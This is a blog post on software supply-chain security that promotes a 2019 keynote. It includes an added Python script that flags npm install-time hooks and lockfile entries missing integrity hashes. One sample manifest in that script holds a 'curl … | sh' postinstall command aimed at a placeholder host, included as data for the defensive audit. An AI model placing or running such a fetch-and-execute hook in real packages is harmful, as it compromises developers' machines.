Posted on by Achim D. Brucker, licensed under CC BY-ND 4.0.

Securing Software Supply Chains

Today, software is rarely developed “on the green field”: software developers are “composers” who build new systems by combining existing solutions. Custom code is, in many development projects, a curiosity.

As a result, modern software depends on numerous third-party projects, which are sometimes as small as three lines of code and sometimes as large as several million lines of code. On the one hand, these projects speed up development. On the other hand, their use requires trust and care: with a few lines of code in an installation script, your development system can be attacked, and a small vulnerability in a dependency can be the root cause of one of the largest data leaks of recent years.
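The two risks named above (install-time scripts in a dependency, and a dependency whose contents are not pinned) can be checked mechanically before a build. The following is an added example, not code from this post or its author: it audits constructed npm `package.json` manifests for lifecycle hooks that run code during installation, and checks a constructed `package-lock.json` fragment for entries without an integrity hash. All package names, commands and hashes are made up.

```python
import json

# Lifecycle hooks npm runs automatically while installing a dependency: any
# command listed here executes on the developer's machine, not in the app.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed sample manifests, as found at node_modules/<name>/package.json.
# Names and commands are made up; "odd-helper" is the suspicious one.
SAMPLE_MANIFESTS = {
    "left-pad-ish": '{"name": "left-pad-ish", "version": "1.0.0"}',
    "native-thing": '{"name": "native-thing", "version": "2.1.0",'
                    ' "scripts": {"install": "node-gyp rebuild"}}',
    "odd-helper": '{"name": "odd-helper", "version": "0.0.3", "scripts":'
                  ' {"postinstall": "curl -s https://example.invalid/x | sh",'
                  ' "test": "mocha"}}',
}

# Constructed package-lock.json fragment (lockfileVersion 1 layout); the
# integrity values are placeholders, not real hashes.
SAMPLE_LOCK = '''{"lockfileVersion": 1, "dependencies": {
  "left-pad-ish": {"version": "1.0.0", "integrity": "sha512-PLACEHOLDER"},
  "native-thing": {"version": "2.1.0", "integrity": "sha512-PLACEHOLDER"},
  "odd-helper": {"version": "0.0.3"}}}'''


def install_hooks(manifest_text):
    """Return {hook: command} for every auto-run install hook in a package.json."""
    scripts = json.loads(manifest_text).get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def audit_manifests(manifests):
    """List (package, hook, command) for every dependency that runs code at install."""
    findings = []
    for name, text in manifests.items():
        for hook, cmd in install_hooks(text).items():
            findings.append((name, hook, cmd))
    return sorted(findings)


def missing_integrity(lock_text):
    """Names of locked dependencies without an integrity hash (tarball unverified)."""
    deps = json.loads(lock_text).get("dependencies") or {}
    return sorted(name for name, entry in deps.items() if not entry.get("integrity"))


if __name__ == "__main__":
    for name, hook, cmd in audit_manifests(SAMPLE_MANIFESTS):
        print(f"{name}: runs '{cmd}' at {hook}")
    print("no integrity hash:", missing_integrity(SAMPLE_LOCK))
```

A build-time hook is not wrong in itself (native modules legitimately compile at install), so the findings are a review list, not a verdict.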

Want to learn more? Attend my keynote at the International Workshop on Secure Software Engineering (SSE 2019). In my keynote, I will argue that the mature tools and techniques for developing secure software do not work well in an environment where software is composed instead of developed. Using real-world examples of third-party components, I will make the case that research in secure software engineering needs to re-prioritize its topics to be fit for a world of software composition.
